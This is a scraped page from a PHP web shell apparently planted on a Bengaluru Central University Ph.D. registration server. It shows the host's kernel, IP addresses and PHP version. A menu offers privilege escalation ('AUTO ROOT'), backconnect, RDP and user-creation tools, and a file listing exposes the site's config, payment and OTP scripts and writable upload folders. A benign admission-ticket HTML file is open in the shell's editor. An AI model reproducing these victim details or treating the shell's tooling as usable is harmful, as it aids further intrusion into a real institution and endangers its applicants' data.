Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.138.60.175
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mcu /
phdadm /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
pget_photos
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
.DS_Store
17.9
KB
-rwxr-xr-x
Hallticket_old.html
5.63
KB
-rwxr-xr-x
MainPage.html
28.01
KB
-rwxr-xr-x
MainPage_with_values.html
28.18
KB
-rwxr-xr-x
Registrationpage.html
5.54
KB
-rwxr-xr-x
Reprint.html
6.41
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.08
KB
-rwxr-xr-x
database.php
395
B
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
4.09
KB
-rwxr-xr-x
hallticket.html
6.89
KB
-rwxr-xr-x
home.html
6.32
KB
-rwxr-xr-x
index.html
6.08
KB
-rwxr-xr-x
login.php
323
B
-rwxr-xr-x
logisys-logo.png
9.04
KB
-rwxr-xr-x
pgResponse.php
9.16
KB
-rwxr-xr-x
resetpassword.php
697
B
-rwxr-xr-x
sendGridMail.php
1.28
KB
-rwxr-xr-x
sendMobEmailOTP.php
1.41
KB
-rwxr-xr-x
sendsmsapi.php
760
B
-rwxr-xr-x
sign-up.html
7.15
KB
-rwxr-xr-x
signin.php
1011
B
-rwxr-xr-x
signup.php
1
KB
-rwxr-xr-x
upload.php
393
B
-rwxr-xr-x
upload1.php
389
B
-rwxr-xr-x
upload_file.php
740
B
-rwxr-xr-x
validateRegno.php
1.51
KB
-rwxr-xr-x
verify.php
9.06
KB
-rwxr-xr-x
verify_old.php
7.04
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hallticket.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport" /> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> <title>Ph.D. Online Registration</title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon" /> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800&subset=latin-ext" rel="stylesheet" /> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css" /> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap_phd.css?v=111" rel="stylesheet" /> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <link href="plugins/dropzone/dropzone.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style_phd.css" rel="stylesheet" /> <link href="css/themes/all-themes.css" rel="stylesheet" /> </head> <body class="theme-pink"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class="col-md-12 m-t--5"> <a href="index.html" style="float: right; padding-top: 15px;font-size:16px;color: #fff;" >Home</a > <center> <h2>Bengaluru Central University</h2> </center> <center> <h3 style="margin-top: -4px;margin-right: 30px;"> Ph.D. Online Registration </h3> </center> </div> </div> </nav> <section class="content"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12"> <div class="card"> <div class="header"> <h2>Admission Ticket</h2> </div> <div class="body"> <div class="row clearfix"> <div class="col-md-6 col-md-offset-3" style="padding-top: 2%;padding-bottom: 2%;" > <b>Application No.</b> <div class="form-group m-b-20"> <span class="fieldError" id="rapp_err"> Application No. is required </span> <div class="form-line"> <div> <input type="text" class="form-control m-b-20" id="rappno" /> </div> </div> </div> <b>Date of Birth</b> <div class="form-group p-b-20"> <span class="fieldError" id="rdob_err"> Date of Birth is required </span> <div class="form-line daterange"> <div> <input type="text" id="rdob" class="form-control date" placeholder="dd/mm/yyyy" /> </div> </div> </div> <button type="button" class="btn btn-primary waves-effect btn" onclick="GenerateHallTicket()" > Print Admission Ticket </button> </div> </div> <div id="bankdet" style="display: none;"></div> </div> </div> </div> </div> </div> </section> <!-- Modal --> <script src="js/appForm.js"></script> <script src="js/control.js"></script> <script src="js/validate.js"></script> <script src="js/hallticket.js"></script> <!-- Jquery Core Js --> <script src="plugins/jquery/jquery.min.js"></script> <script src="js/Registrationpage.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Select Plugin Js --> <script src="plugins/bootstrap-select/js/bootstrap-select.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Autosize Plugin Js --> <script src="https://checkout.razorpay.com/v1/checkout.js"></script> <script src="js/form_submit.js"></script> <!-- Input Mask Plugin Js --> <script src="plugins/jquery-inputmask/jquery.inputmask.bundle.js"></script> <script src="plugins/dropzone/dropzone.js"></script> <script src="plugins/bootstrap-tagsinput/bootstrap-tagsinput.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/appStatus.js"></script> <!-- <script src="js/kusPhdAdm.js"></script> --> <!-- Demo Js --> <script src="js/demo.js"></script> <script type="text/javascript"> $(function() { $("li").click(function() { // remove classes from all $("li").removeClass("active"); // add class to the one we clicked $(this).addClass("active"); }); }); var $demoMaskedInput = $(".daterange"); //Date $demoMaskedInput .find(".date") .inputmask("dd/mm/yyyy", { placeholder: "__/__/____" }); </script> </body> </html>
Close